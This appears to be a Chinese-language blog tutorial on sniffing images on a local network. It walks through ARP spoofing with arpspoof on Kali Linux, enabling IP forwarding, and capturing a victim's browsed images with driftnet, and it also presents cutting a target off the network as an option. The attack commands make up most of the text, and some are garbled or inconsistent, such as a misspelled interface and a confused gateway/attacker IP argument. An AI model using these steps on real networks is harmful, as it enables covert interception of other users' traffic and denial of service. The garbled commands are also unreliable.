天天看點

區域網路嗅探圖檔

需要配合linux Kali滲透測試平台

關于arp欺騙的原理可以參考我以前寫的文章,有興趣的可以去了解一下,這裡就不做詳解了

點這裡傳送過去

直接上代碼

arpspoof -i ech0(網卡)  -t  目标機ip  本地區域網路關  //單向的arp欺騙,可以讓目标單純的斷網  不來流量轉發目标機會斷網
           

如果隻是攻擊的話,大可隻用第二條指令讓對方斷網

不過arp欺騙可不單單隻有令對方斷網這麼簡單,arp的作用可多着去了,下面給大家介紹這款配合arp欺騙的工具

廢話不多說,直接上教程

一.driftnet

driftnet 主要用來嗅探被arp欺騙後的主機所流量的圖檔

常用指令:

-b :捕獲到新的圖檔時發出提示聲

-i interface :選擇要監聽的網卡

-p :不讓所監聽的接口使用混雜模式

-a :背景模式:将捕獲的圖檔儲存到目錄中(不會顯示在螢幕上)

-m number :指定儲存圖檔數的數目

-d directory :指定儲存圖檔的路徑

-x prefix :指定儲存圖檔的字首名
           

1.開啟資料流量轉發:

因為Kali為了系統安全,是以預設關閉了這個選項,可以到Kali中檢視/proc/sys/net/ipv4/ip_forward,該檔案内容預設為0,即禁止資料包轉發,

可以通過echo 1 > /proc/sys/net/ipv4/ip_forward

來開啟流量轉發,不然靶機會斷網!!!
區域網路嗅探圖檔

攻擊指令

arpspoof -i eth0 -t 靶機ip 攻擊機ip
           
區域網路嗅探圖檔

ARP欺騙成功後,通過driftnet指令來擷取内網單機浏覽的圖檔:

driftnet -i eth0
           
區域網路嗅探圖檔

成功嗅探顯示浏覽器上的圖檔

區域網路嗅探圖檔